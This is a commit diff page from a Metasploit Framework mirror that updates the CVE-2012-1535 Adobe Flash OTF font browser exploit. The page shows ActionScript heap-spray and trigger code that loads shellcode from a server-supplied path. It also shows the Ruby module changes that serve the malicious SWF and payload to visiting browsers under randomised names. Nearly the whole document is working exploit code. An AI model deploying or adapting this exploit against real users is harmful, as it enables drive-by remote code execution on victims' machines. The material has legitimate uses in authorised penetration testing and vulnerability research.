infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'flash_exploit_r2' of https://github.com/wchen-r7/metasploit-framework into wchen-r7-flash_exploit_r2

unstable
sinn3r 2012-08-22 10:00:34 -05:00
parent 1b6fe22359 f715527423
commit 22051c9c2c
4 changed files with 127 additions and 117 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/exploits/CVE-2012-1535/Main.swf Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2012-1535/trigger.swf
View File

Binary file not shown.

209
external/source/exploits/CVE-2012-1535/Main.as vendored
View File

@ -1,118 +1,119 @@
package { package {
import flash.text.engine.*; import flash.text.engine.*;
import flash.utils.*; import flash.utils.*;
import flash.display.*; import flash.display.*;
import flash.events.*; import flash.events.*;
import flash.net.*; import flash.net.*;
import flash.external.*; import flash.external.*;
public class Main extends Sprite { public class Main extends Sprite {
private var FontClass:Class; private var FontClass:Class;
public var kbArray:ByteArray; public var kbArray:ByteArray;
public var mbArray:ByteArray; public var mbArray:ByteArray;
public var tmpArray:ByteArray; public var tmpArray:ByteArray;
public var allocs:Array; public var allocs:Array;
private var shellcode:String; private var shellcode:String;
private var urlLoader:URLLoader = new URLLoader(); private var urlLoader:URLLoader = new URLLoader();
public function Main():void{ public function Main():void{
this.FontClass = Main_FontClass; this.FontClass = Main_FontClass;
super(); super();
var path:String = "/pay.txt"; var source:String = root.loaderInfo.parameters.s;
var urlRequest:URLRequest = new URLRequest(path); var path:String = "/" + source + ".txt"
urlLoader.dataFormat = URLLoaderDataFormat.TEXT; var urlRequest:URLRequest = new URLRequest(path);
urlLoader.addEventListener(Event.COMPLETE, urlLoader_complete); urlLoader.dataFormat = URLLoaderDataFormat.TEXT;
urlLoader.load(urlRequest); urlLoader.addEventListener(Event.COMPLETE, urlLoader_complete);
} urlLoader.load(urlRequest);
}
public function finishExploit(p:String):void{ public function finishExploit(p:String):void{
this.heapSpray(p); this.heapSpray(p);
this.TextBlock_createTextLineExample(); this.TextBlock_createTextLineExample();
} }
public function urlLoader_complete(evt:Event):void { public function urlLoader_complete(evt:Event):void {
finishExploit(urlLoader.data); finishExploit(urlLoader.data);
} }
public function TextBlock_createTextLineExample():void{ public function TextBlock_createTextLineExample():void{
var _local1 = "Edit the world in hex."; var _local1 = "Edit the world in hex.";
var _local2:FontDescription = new FontDescription("PSpop"); var _local2:FontDescription = new FontDescription("PSpop");
_local2.fontLookup = FontLookup.EMBEDDED_CFF; _local2.fontLookup = FontLookup.EMBEDDED_CFF;
var _local3:ElementFormat = new ElementFormat(_local2); var _local3:ElementFormat = new ElementFormat(_local2);
_local3.fontSize = 16; _local3.fontSize = 16;
var _local4:TextElement = new TextElement(_local1, _local3); var _local4:TextElement = new TextElement(_local1, _local3);
var _local5:TextBlock = new TextBlock(); var _local5:TextBlock = new TextBlock();
_local5.content = _local4; _local5.content = _local4;
this.createLines(_local5); this.createLines(_local5);
} }
private function createLines(_arg1:TextBlock):void{ private function createLines(_arg1:TextBlock):void{
var _local2:Number = 300; var _local2:Number = 300;
var _local3:Number = 15; var _local3:Number = 15;
var _local4:Number = 20; var _local4:Number = 20;
var _local5:TextLine = _arg1.createTextLine(null, _local2); var _local5:TextLine = _arg1.createTextLine(null, _local2);
while (_local5) { while (_local5) {
_local5.x = _local3; _local5.x = _local3;
_local5.y = _local4; _local5.y = _local4;
_local4 = (_local4 + (_local5.height + 2)); _local4 = (_local4 + (_local5.height + 2));
addChild(_local5); addChild(_local5);
_local5 = _arg1.createTextLine(_local5, _local2); _local5 = _arg1.createTextLine(_local5, _local2);
}; };
} }
public function heapSpray(p:String):void{ public function heapSpray(p:String):void{
var _local1:uint; var _local1:uint;
_local1 = 0; _local1 = 0;
this.kbArray = new ByteArray(); this.kbArray = new ByteArray();
this.kbArray.endian = Endian.LITTLE_ENDIAN; this.kbArray.endian = Endian.LITTLE_ENDIAN;
var _local4:String = p; var _local4:String = p;
var _local5:ByteArray = this.hexToBin(_local4); var _local5:ByteArray = this.hexToBin(_local4);
var _local6:uint = (_local4.length / 2); var _local6:uint = (_local4.length / 2);
_local1 = 0; _local1 = 0;
while (_local1 < 0x0400) { while (_local1 < 0x0400) {
this.kbArray.writeByte(12); this.kbArray.writeByte(12);
_local1 = (_local1 + 1); _local1 = (_local1 + 1);
}; };
_local1 = 0; _local1 = 0;
this.mbArray = new ByteArray(); this.mbArray = new ByteArray();
this.mbArray.endian = Endian.LITTLE_ENDIAN; this.mbArray.endian = Endian.LITTLE_ENDIAN;
while (_local1 < 0x0400) { while (_local1 < 0x0400) {
this.mbArray.writeBytes(this.kbArray, 0, this.kbArray.length); this.mbArray.writeBytes(this.kbArray, 0, this.kbArray.length);
_local1 = (_local1 + 1); _local1 = (_local1 + 1);
}; };
_local1 = 0; _local1 = 0;
while (_local1 < 0x100000) { while (_local1 < 0x100000) {
this.mbArray.position = _local1; this.mbArray.position = _local1;
this.mbArray.writeBytes(_local5, 0, _local5.length); this.mbArray.writeBytes(_local5, 0, _local5.length);
_local1 = (_local1 + 65536); _local1 = (_local1 + 65536);
}; };
_local1 = 0; _local1 = 0;
this.allocs = new Array(); this.allocs = new Array();
while (_local1 < 0x0200) { while (_local1 < 0x0200) {
this.tmpArray = new ByteArray(); this.tmpArray = new ByteArray();
this.tmpArray.endian = Endian.LITTLE_ENDIAN; this.tmpArray.endian = Endian.LITTLE_ENDIAN;
this.tmpArray.writeBytes(this.mbArray, 0, this.mbArray.length); this.tmpArray.writeBytes(this.mbArray, 0, this.mbArray.length);
this.allocs.push(this.tmpArray); this.allocs.push(this.tmpArray);
_local1 = (_local1 + 1); _local1 = (_local1 + 1);
}; };
} }
private function hexToBin(_arg1:String):ByteArray{ private function hexToBin(_arg1:String):ByteArray{
var _local5:String; var _local5:String;
var _local2:ByteArray = new ByteArray(); var _local2:ByteArray = new ByteArray();
var _local3:uint = _arg1.length; var _local3:uint = _arg1.length;
var _local4:uint; var _local4:uint;
_local2.endian = Endian.LITTLE_ENDIAN; _local2.endian = Endian.LITTLE_ENDIAN;
while (_local4 < _local3) { while (_local4 < _local3) {
_local5 = (_arg1.charAt(_local4) + _arg1.charAt((_local4 + 1))); _local5 = (_arg1.charAt(_local4) + _arg1.charAt((_local4 + 1)));
_local2.writeByte(parseInt(_local5, 16)); _local2.writeByte(parseInt(_local5, 16));
_local4 = (_local4 + 2); _local4 = (_local4 + 2);
}; };
return (_local2); return (_local2);
} }
} }
} }

21
modules/exploits/windows/browser/adobe_flash_otf_font.rb
View File

@ -8,7 +8,7 @@
require 'msf/core' require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
@ -264,7 +264,8 @@ class Metasploit3 < Msf::Exploit::Remote
return return
end end
swf_uri = get_resource() + Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf" #swf_uri = get_resource() + Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf"
swf_uri = "/#{@resource_name}.txt.swf"
html = %Q| html = %Q|
<html> <html>
@ -273,6 +274,7 @@ class Metasploit3 < Msf::Exploit::Remote
<body> <body>
<object width="1" height="1" type="application/x-shockwave-flash" data="#{swf_uri}"> <object width="1" height="1" type="application/x-shockwave-flash" data="#{swf_uri}">
<param name="movie" value="#{swf_uri}"> <param name="movie" value="#{swf_uri}">
<param name="FlashVars" value="s=#{@resource_name}">
</object> </object>
</body> </body>
</html> </html>
@ -284,7 +286,7 @@ class Metasploit3 < Msf::Exploit::Remote
proc = Proc.new do |cli, req| proc = Proc.new do |cli, req|
on_request_uri(cli, req) on_request_uri(cli, req)
end end
add_resource({'Path' => "/pay.txt", 'Proc' => proc}) rescue nil add_resource({'Path' => "/#{@resource_name}.txt", 'Proc' => proc}) rescue nil
print_status("Sending HTML") print_status("Sending HTML")
send_response(cli, html, {'Content-Type'=>'text/html'}) send_response(cli, html, {'Content-Type'=>'text/html'})
@ -292,12 +294,19 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
@swf = create_swf @swf = create_swf
print_status("SWF Loaded: #{@swf.length.to_s} bytes") @resource_name = Rex::Text.rand_text_alpha(5)
vprint_status("SWF Loaded: #{@swf.length.to_s} bytes")
datastore['URIPATH'] = datastore['URIPATH'] || random_uri
datastore['URIPATH'] = '/' + datastore['URIPATH'] if datastore['URIPATH'] !~ /^\//
datastore['URIPATH'] = datastore['URIPATH'][0,3] if datastore['URIPATH'].length > 3
vprint_status("URIPATH set to #{datastore['URIPATH']}")
super super
end end
def create_swf def create_swf
path = ::File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-1535", "trigger.swf" ) path = ::File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-1535", "Main.swf" )
fd = ::File.open( path, "rb" ) fd = ::File.open( path, "rb" )
swf = fd.read(fd.stat.size) swf = fd.read(fd.stat.size)
fd.close fd.close
@ -306,7 +315,7 @@ class Metasploit3 < Msf::Exploit::Remote
def cleanup def cleanup
vprint_status("Removing txt resource") vprint_status("Removing txt resource")
remove_resource('/pay.txt') rescue nil remove_resource("/#{@resource_name}.txt") rescue nil
super super
end end